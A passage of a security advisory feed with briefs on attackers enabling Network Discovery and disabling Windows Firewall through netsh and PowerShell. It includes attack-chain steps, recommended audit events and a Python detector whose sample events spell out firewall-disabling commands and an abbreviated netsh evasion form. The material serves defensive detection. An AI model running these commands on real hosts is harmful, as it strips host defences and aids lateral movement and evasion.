<li>The specific command executed enables Network Discovery using the <code>netsh advfirewall firewall set rule group=&quot;Network Discovery&quot; new enable=Yes</code> syntax.</li>
<li>The firewall rule group &ldquo;Network Discovery&rdquo; is modified to allow inbound and outbound traffic.</li>
<li>The compromised host begins sending out broadcast messages, advertising its presence and services on the network.</li>
<li>The attacker uses the information gathered to identify other vulnerable systems on the network.</li>
<li>The attacker moves laterally to other systems based on the discovery information.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to easily enumerate and identify other vulnerable systems within the network. This can lead to rapid lateral movement, further compromising the environment. The risk is heightened when the compromised host has access to sensitive data or critical systems. There is no specific victim count or sector targeted mentioned in the provided source.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Enable Host Network Discovery via Netsh&rdquo; to your SIEM to detect the use of <code>netsh.exe</code> to enable network discovery (see rule below).</li>
<li>Audit firewall rule and profile changes at the source, not only via process creation: the <code>Microsoft-Windows-Windows Firewall With Advanced Security/Firewall</code> event log records rule additions, modifications and deletions (Event IDs 2004, 2005 and 2006) and profile setting changes (2003), and enabling &ldquo;Audit MPSSVC Rule-Level Policy Change&rdquo; yields the equivalent Security log events (4946, 4947, 4948). Alert on changes to the &ldquo;Network Discovery&rdquo; rule group in particular.</li>
<li>Review and restrict the use of <code>netsh.exe</code> to authorized personnel and systems only.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>defense-evasion</category><category>windows</category><category>firewall</category></item><item><title>Windows Firewall Disabled via PowerShell</title><link>https://feed.craftedsignal.io/briefs/2024-01-powershell-firewall-disable/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-powershell-firewall-disable/</guid><description>Attackers may disable the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet to enable lateral movement and command and control activity.</description><content:encoded><![CDATA[<p>Attackers often attempt to disable or modify system firewalls to evade network restrictions and facilitate lateral movement within a compromised environment. The Windows Firewall, a built-in component, provides host-based traffic filtering. Disabling it allows unrestricted communication, aiding command and control activities and hindering detection efforts. This activity is commonly achieved through PowerShell, leveraging cmdlets like <code>Set-NetFirewallProfile</code>. The rule focuses on detecting the use of this specific cmdlet to disable the Windows Firewall, alerting defenders to potential defense evasion attempts. This technique is valuable to attackers across various attack vectors, especially after initial access has been established.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Access: An attacker gains initial access through methods such as phishing or exploiting a vulnerability in a network-facing application.</li>
<li>Privilege Escalation (if necessary): The attacker escalates privileges to gain the necessary permissions to modify firewall settings.</li>
<li>PowerShell Execution: The attacker executes PowerShell, either through an interactive session or a script.</li>
<li>Disable Firewall Profile: The attacker runs <code>Set-NetFirewallProfile -Enabled False</code> with either <code>-All</code> or <code>-Profile Domain,Public,Private</code> (or a subset of those profiles), turning the firewall off for the chosen profiles without touching individual rules.</li>
<li>Network Reconnaissance: With the firewall disabled, the attacker performs network reconnaissance to identify valuable assets and potential lateral movement paths.</li>
<li>Lateral Movement: The attacker moves laterally to other systems on the network, exploiting trust relationships or vulnerabilities.</li>
<li>Command and Control: The attacker establishes command and control channels to communicate with compromised systems and exfiltrate sensitive data.</li>
<li>Data Exfiltration or Further Exploitation: The attacker exfiltrates sensitive data or continues to exploit the environment based on their objectives.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful disabling of the Windows Firewall can lead to unrestricted lateral movement within a network, allowing attackers to compromise additional systems and exfiltrate sensitive data. This can result in data breaches, financial losses, and reputational damage. While the source does not specify the number of affected organizations, any environment relying on Windows Firewall for network segmentation is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect the use of <code>Set-NetFirewallProfile</code> with the <code>-Enabled False</code> parameter (see Sigma rule below).</li>
<li>Enable process creation logging on Windows endpoints to capture PowerShell executions (reference the logsource in the Sigma rule), and pair it with PowerShell script block logging (Event ID 4104): a command-line rule only sees the cmdlet when it appears in clear on the command line, not when it is run from a script file or passed via <code>-EncodedCommand</code>.</li>
<li>Investigate any alerts generated by the Sigma rule to determine the legitimacy of the firewall modification activity.</li>
<li>Review and enforce the principle of least privilege to limit the number of users with permissions to modify firewall settings.</li>
<li>Consider implementing additional network segmentation and monitoring controls to detect and prevent lateral movement even if the Windows Firewall is disabled.</li>
</ul>
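<p>The four Windows briefs above all reduce to classifying process-creation command lines, so here is one classifier that covers them: netsh profile disable, netsh rule disable, enabling the Network Discovery rule group, firewall discovery in both the legacy <code>netsh firewall</code> and the <code>netsh advfirewall</code> contexts, and <code>Set-NetFirewallProfile</code> with <code>-Enabled False</code>. This is an added example and not the feed&rsquo;s Sigma rules; the labels, the tokenizer and the sample Sysmon-style events are constructed. It also handles one evasion the briefs do not mention: netsh accepts any unambiguous prefix of a keyword (<code>netsh int ip</code> works), so an exact-string rule on <code>advfirewall</code> misses <code>netsh advf set allp state off</code>.</p>

```python
"""Classify Windows process-creation command lines for host-firewall tampering and discovery.
Added example for these briefs; labels, tokenizer and sample events are constructed."""
from __future__ import annotations

import re

# Labels chosen for this example (not Sigma rule titles).
PROFILE_DISABLE = "firewall_profile_disabled"       # netsh advfirewall set PROFILE state off
RULE_DISABLE = "firewall_rule_disabled"             # netsh advfirewall firewall set rule ... enable=no
NET_DISCOVERY = "network_discovery_enabled"         # ... set rule group="Network Discovery" new enable=yes
FW_DISCOVERY = "firewall_discovery"                 # netsh firewall show ... / netsh advfirewall show ...
PS_PROFILE_DISABLE = "powershell_profile_disabled"  # Set-NetFirewallProfile ... -Enabled False

_PROFILES = ("allprofiles", "currentprofile", "domainprofile", "privateprofile", "publicprofile")
_PS_DISABLE = re.compile(r"set-netfirewallprofile.*-enabled[\s:]+\$?false\b", re.IGNORECASE)


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace, keeping double-quoted runs as one token (quotes removed).
    shlex is avoided on purpose: its POSIX backslash rules mangle C:\\Windows\\System32 paths."""
    tokens, buf, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if buf:
                tokens.append("".join(buf))
                buf = []
        else:
            buf.append(ch)
    return tokens + ["".join(buf)] if buf else tokens


def _is(token: str, keyword: str) -> bool:
    """netsh accepts any unambiguous prefix of a keyword (netsh int ip == netsh interface ip), so
    exact-string rules are easy to dodge; accept any prefix of two or more characters."""
    return len(token) >= 2 and keyword.startswith(token)


def classify_netsh(args: list[str]) -> str | None:
    """args: lower-cased tokens following netsh.exe."""
    if len(args) >= 2 and _is(args[0], "advfirewall"):
        verb = args[1]
        if _is(verb, "show"):
            return FW_DISCOVERY
        if (_is(verb, "set") and len(args) >= 5 and any(_is(args[2], p) for p in _PROFILES)
                and _is(args[3], "state") and args[4] == "off"):
            return PROFILE_DISABLE
        if _is(verb, "firewall") and len(args) >= 4 and _is(args[2], "set") and _is(args[3], "rule"):
            rest = args[4:]  # quotes are gone, so group="Network Discovery" is one token
            if "enable=yes" in rest and "group=network discovery" in rest:
                return NET_DISCOVERY
            if "enable=no" in rest:
                return RULE_DISABLE
        return None
    if len(args) >= 2 and _is(args[0], "firewall") and _is(args[1], "show"):
        return FW_DISCOVERY  # legacy context: deprecated but still accepted, and what old tooling emits
    return None


def classify(cmdline: str) -> str | None:
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    exe = tokens[0].lower().replace("\\", "/").rsplit("/", 1)[-1]
    if exe in ("netsh", "netsh.exe"):
        return classify_netsh([t.lower() for t in tokens[1:]])
    # Only catches the cmdlet when it is in clear on the command line; script files and
    # -EncodedCommand payloads need PowerShell script block logging (Event ID 4104).
    return PS_PROFILE_DISABLE if _PS_DISABLE.search(cmdline) else None


def scan(events: list[dict]) -> list[dict]:
    """Run classify() over Sysmon Event ID 1 style records, keeping who ran it and what spawned it."""
    hits = []
    for ev in events:
        label = classify(ev.get("CommandLine", ""))
        if label:
            hits.append({"label": label, "user": ev.get("User"), "parent": ev.get("ParentImage"), "cmd": ev["CommandLine"]})
    return hits


# Constructed Sysmon-style events; users, parents and rule names are illustrative.
SAMPLE_EVENTS = [
    {"User": "CORP\\svc-backup", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "C:\\Windows\\System32\\netsh.exe advfirewall set allprofiles state off"},
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'netsh advfirewall firewall set rule name="Remote Desktop - User Mode (TCP-In)" new enable=no'},
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes'},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\Temp\\updater.exe",
     "CommandLine": "netsh firewall show state"},
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "netsh advf show allp"},  # abbreviated form an exact-match rule misses
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"'},
    {"User": "CORP\\helpdesk", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "netsh interface ip show config"},  # benign: no hit
    {"User": "CORP\\installer", "ParentImage": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="App" dir=in action=allow program="C:\\app\\app.exe"'},  # add, not disable
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["label"], "|", hit["user"], "|", hit["parent"], "|", hit["cmd"])
```

<p>The parent image and user in each hit are what an analyst triages first: <code>netsh firewall show state</code> run as SYSTEM from an executable in <code>C:\Windows\Temp</code> is a different conversation from the same command run by the help desk from <code>cmd.exe</code>. The PowerShell branch is deliberately narrow; it only sees cmdlets written in clear on the command line, so script block logging (Event ID 4104) is needed alongside process creation events to cover scripts and encoded commands.</p>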
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>defense-evasion</category><category>powershell</category><category>firewall</category><category>windows</category></item></channel></rss>